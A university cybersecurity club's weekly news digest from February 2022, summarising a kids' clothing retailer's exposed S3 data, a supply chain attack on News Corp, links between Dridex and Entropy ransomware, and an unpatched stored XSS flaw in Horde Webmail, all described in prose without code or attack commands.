Cyber Security News of the week — 21.02.2022|25.02.2022
Kids Luxury Clothing Store Melijoe Exposed 200GB of Customers’ Data
Paris, France-based popular online luxury clothing e-Commerce website for kids was caught exposing the personal and sensitive data of its customers worldwide, especially children.
Thanks to one of its misconfigured Amazon S3 buckets, which was left exposed to public access without any password or security authentication meant anyone with knowledge of how to find misconfigured databases could have accessed the data.
Researchers at Safety Detectives identified three datasets that contained records on its customers’ purchases, preferences, and Wishlist.
Further analysis of these datasets revealed sensitive information such as the following:
In its blog post published Feb 21st, 2022, Safety Detectives revealed that its cybersecurity team informed Melijoe about the incident on November 12th, 2021 however it did not receive any response from the company.
Initially, French Computer Emergency Response Team (CERT) confirmed that it will inform Melijoe, however, a month later the agency revealed that the shopping site did not respond to its alert which is also a clear violation of General Data Protection Regulation .
On January 10th, 2022, an independent French administrative regulatory body named CNIL, confirmed that authorities are handling the issue.
News Corp’s Software Supply Chain Attack Proves the Need for Enhanced Security Posture
Journalists from News Corp have been targeted in a recent series of cyberattacks, which underscores the need to ensure adequate protection for organizations’ SaaS services.
It is reported that the hackers have had access to emails, documents on Google Docs, as well as article drafts.
The company discovered that one of the cloud service providers it utilized had been the target of persistent cyberattacks.
Said cloud service providers are used to support the company’s various business operations and are thus considered upstream suppliers — hence the cyberattack being described as a supply chain attack.
The attack on the media conglomerate underscores the need for extended security posture management, especially since News Corp did not specify what particular cloud services were compromised and how the attackers were able to gain access to these SaaS services. However, the news organization’s security advisors believe that it was a state-sponsored attack–that the hack was most likely intended to gather intelligence for the benefit of the Chinese government. This is not the only time that a media company had been targeted by a major cyberattack.
Dridex Malware Deploying Entropy Ransomware on Hacked Computers
Similarities have been unearthed between the Dridex general-purpose malware and a little-known ransomware strain called Entropy, suggesting that the operators are continuing to rebrand their extortion operations under a different name.
The similarities are in the software packer used to conceal the ransomware code, in the malware subroutines designed to find and obfuscate commands, and in the subroutines used to decrypt encrypted text, cybersecurity firm Sophos said in a report shared with The Hacker News.
The commonalities were uncovered following two unrelated incidents targeting an unnamed media company and a regional government agency.
The attack on the media organization used the Proxy Shell exploit to strike a vulnerable Exchange Server with the goal of installing a web shell that, in turn, was utilized to spread Cobalt Strike Beacons on the network. The second attack on the regional government organization, on the other hand, was facilitated through a malicious email attachment containing the Dridex malware, using it to deploy additional payloads for lateral movement.
The Dridex trojan, an information-stealing botnet, is known to be the handiwork of a prolific Russia-based cybercrime group called Indrik Spider. DoppelPaymer is attributed to a splinter group tracked under the moniker Doppel Spider, which leverages forked malware code developed by Indrik Spider, including the Bit Paymer ransomware, as the foundation for its big game hunting operations.
The e-crime gang has since cycled through numerous branding changes to their ransomware infrastructure in the intervening years to get around the sanctions, chief among them being WastedLocker, Hades, Phoenix, PayloadBIN, Grief, and Macaw. That said, it’s also possible that the malware operators have borrowed the code, either to save development efforts or deliberately mislead attribution in what’s a false flag operation.
Properly patched machines, like the Exchange Server, would have forced the attackers to work harder to make their initial access into the organizations they penetrated.
9-Year-Old Unpatched Email Hacking Bug Uncovered in Horde Webmail Software
Users of Horde Webmail are being urged to disable a feature to contain a nine-year-old unpatched security vulnerability in the software that could be abused to gain complete access to email accounts simply by previewing an attachment.
Stored XSS attacks arise when a malicious script is injected directly into a vulnerable web application’s server, such as a comment field of a website, causing the untrusted code to be retrieved and transmitted to the victim’s browser every time the stored information is requested.
The vulnerability triggers when a targeted user views an attached OpenOffice document in the browser, Scannell said. As a result, an attacker can steal all emails the victim has sent and received.
The shortcoming was originally reported to the project maintainers on August 26, 2021, but to date no fixes have been shipped despite confirmation from the vendor acknowledging the flaw.
Stay Focused. Stay Vigilant.
Cyber Security News Team — Cyber Security Community of SLIIT